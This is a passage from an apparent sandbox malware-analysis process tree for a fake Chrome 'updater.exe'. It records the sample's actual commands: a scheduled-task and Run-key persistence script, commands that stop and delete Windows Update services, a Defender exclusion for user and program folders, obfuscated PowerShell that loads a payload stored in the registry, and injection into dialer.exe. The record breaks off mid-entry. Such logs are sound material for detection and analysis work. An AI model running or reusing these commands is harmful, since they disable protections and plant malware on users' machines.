powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
PID:3928

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2028

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1424

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:3128

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:4132

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1688

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1688 -s 220
5⤵
PID:1040

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Launches sc.exe
PID:4648

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:3956

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:4460

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:4496

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:1404

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:4136

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:2624

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
3⤵
- Drops file in Windows directory
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
3⤵
PID:4944

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4464

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
4⤵
PID:1660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3328

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3516

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3516 -s 148
2⤵
- Program crash
- Checks processor information in registry
PID:4376

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3704

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:1656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:436

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2000

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1912

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4456

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4456 -s 356
2⤵
- Program crash
- Checks processor information in registry
PID:3128

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:4664

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:5100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3132

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
1⤵
PID:4908

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5028

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
1⤵
PID:1152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1192

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2824

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4564

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4448

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1360

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1672

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:268

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:2384

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1268

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:2044

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:5116

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:3760

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:728

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:4744

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:4932

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:1704

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:3824

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:4592

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3828

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
PID:980

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
PID:4700

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
PID:4424

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
PID:216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3896

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4752

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe xtrjicqmdliu
3⤵
PID:2672

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
4⤵
- Drops file in Program Files directory
PID:1756

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4192

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:4944

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3148

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
- Detects videocard installed
PID:1716

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=
3⤵
PID:4956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:3612

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of SetWindowsHookEx
PID:4676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:1668

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Checks processor information in registry
PID:3000

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2456

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2916

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:3596

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1108

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1524

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:2836

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:496

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:4528

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1556

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:892

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:4132

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:2172

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:1284

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:3372

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Checks computer location settings
- Checks system information in the registry
- Enumerates system info in registry
PID:3540

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4476

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
PID:2016

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
PID:1660

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
PID:1956

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
PID:3044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4140

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:928

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:4200

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:756

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
- Detects videocard installed
PID:3860

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:1784

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of SetWindowsHookEx
PID:4448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:2968

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of SetWindowsHookEx
PID:1864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:968

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1176

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:3264

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 424 -p 3516 -ip 3516
2⤵
PID:3312

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 464 -p 4456 -ip 4456
2⤵
PID:2292

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 4256 -ip 4256
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1416

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 3828 -ip 3828
2⤵
PID:1420

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 1372 -ip 1372
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1388

C:\Windows\system32\WerFault.exe
